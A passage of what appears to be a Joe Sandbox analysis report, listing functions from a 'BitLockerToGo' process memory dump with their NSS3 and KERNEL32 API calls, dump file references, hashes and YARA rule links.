                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2509447271-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6009962952c32d91214843798800be9d889efca2f06f9ee4efe4544fb420ddea
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d530eda24b6cd4b4719185a928cb5e82a9154033a2cd724021a061c5ea115772
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6009962952c32d91214843798800be9d889efca2f06f9ee4efe4544fb420ddea
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D418171A093519FC714CE28C844A4FB7E5ABD9754F15CA2DFC98D3300E730E989879A
                                                                                                                                                                                                                                                                                                                                                          Function 6C668C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C668C7C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DC6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C709DED
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C668CB0
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C668CD1
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C668CE5
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C668D2E
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C668D62
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C668D93
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3131193014-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8098f7b14007c5ff7a4cb0e10fac86091ec169abf76c8c3b715c50c32bbda97c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b26df07342d19b810087c6bbedf6385a62e4eb65e778ab56917209330fff0c5e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8098f7b14007c5ff7a4cb0e10fac86091ec169abf76c8c3b715c50c32bbda97c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8312571A01205AFEB009F7ADC447DA77B0BF5A318F140136EA1967FA0D770A924C7DA
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C6A9C5B), ref: 6C6A9D82
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C6A9C5B), ref: 6C6A9DA9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000,?,6C63F599,?,00000000), ref: 6C6A136A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000,?,6C63F599,?,00000000), ref: 6C6A137E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: PL_ArenaGrow.NSS3(?,6C63F599,?,00000000,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000,?,6C63F599,?), ref: 6C6A13CF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: PR_Unlock.NSS3(?,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000,?,6C63F599,?,00000000), ref: 6C6A145C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C6A9C5B), ref: 6C6A9DCE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000,?,6C63F599,?,00000000), ref: 6C6A13F0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: PL_ArenaGrow.NSS3(?,6C63F599,?,?,?,00000000,00000000,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C6A1445
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C6A9C5B), ref: 6C6A9DDC
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C6A9C5B), ref: 6C6A9DFE
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C6A9C5B), ref: 6C6A9E43
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C6A9C5B), ref: 6C6A9E91
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C69FAAB,00000000), ref: 6C6A157E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C69FAAB,00000000), ref: 6C6A1592
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C6A1600
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1560: PL_ArenaRelease.NSS3(?,?), ref: 6C6A1620
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1560: PR_Unlock.NSS3(?), ref: 6C6A1639
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3425318038-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e33632ba53bddd1a9c324ba4a4d2ef701814b8e47b6f6a337e312f5c19c0bc40
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B417CB4601606AFE7409F55D840B92BBA1FF4534CF248128D9188BFA1EB73E836CF94
                                                                                                                                                                                                                                                                                                                                                          Function 6C66DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C66DDEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A08B4
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C66DE70
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C66DE83
                                                                                                                                                                                                                                                                                                                                                          • HASH_ResultLenByOidTag.NSS3(?), ref: 6C66DE95
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C66DEAE
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C66DEBB
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C66DECC
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1091488953-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 26078db6b075299ac974fe397be7b454b1313ce60c79d9b0c2fcaab2d9972066
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a5ddca34aa40384396927a1f65b10d5b3b2a4b5ced1f65aa53a59e6eae6569d5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26078db6b075299ac974fe397be7b454b1313ce60c79d9b0c2fcaab2d9972066
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D31F8B2E002146BDB00AF6AAD40BBB76B8DF95708F150135ED09A7B41FB31D915C6EB
                                                                                                                                                                                                                                                                                                                                                          Function 6C69DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C69D9E4,00000000), ref: 6C69DC30
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C69D9E4,00000000), ref: 6C69DC4E
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C69D9E4,00000000), ref: 6C69DC5A
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C69DC7E
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C69DCAD
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2632744278-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f38bcc07301753288a0017bed4e3dbc83ead03d4a827918d2d6b400c5e30e779
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ac4a915b6bcb9575b9e5fa8ab9d0fe0a1a58f8331b941a0e30a79b4b252b440c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f38bcc07301753288a0017bed4e3dbc83ead03d4a827918d2d6b400c5e30e779
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06315CB5A00202DFE750CF5DD884B96B7F8AF05358F148479E948CBB01E772E944CBA9
                                                                                                                                                                                                                                                                                                                                                          Function 6C662E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C65E728,?,00000038,?,?,00000000), ref: 6C662E52
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C662E66
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C662E7B
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C662E8F
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C662E9E
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C662EAB
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C662F0D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3106257965-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fb9640a323127f3f91b2407829186973bf5579b6a206079f821ebdcd94b1cb7a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3e5d49608704887a5a29cbf45d58be37074708262c055bab6db8c06f9916428a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb9640a323127f3f91b2407829186973bf5579b6a206079f821ebdcd94b1cb7a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE3105B5A00505ABEF009F29DC848AABB79FF46359B548174EC08C7B21EB31DC65C7E6
                                                                                                                                                                                                                                                                                                                                                          Function 6C6ACEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,6C6ACD93,?), ref: 6C6ACEEE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C6ACD93,?), ref: 6C6ACEFC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C6ACD93,?), ref: 6C6ACF0B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A08B4
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C6ACD93,?), ref: 6C6ACF1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C698D2D,?,00000000,?), ref: 6C69FB85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C69FBB1
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF47
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF67
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,6C6ACD93,?,?,?,?,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF78
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4291907967-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e40269497445565c2e889eedd700ffab6c87b6f75f8b9824c25f5cd87f97302b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4611D5A5A00205ABEB00ABE66C41B6BB5EC9F4924DF044039EC0AD7741FB61DD0986BA
                                                                                                                                                                                                                                                                                                                                                          Function 6C658C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C658C1B
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C658C34
                                                                                                                                                                                                                                                                                                                                                          • PL_ArenaAllocate.NSS3 ref: 6C658C65
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C658C9C
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C658CB6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
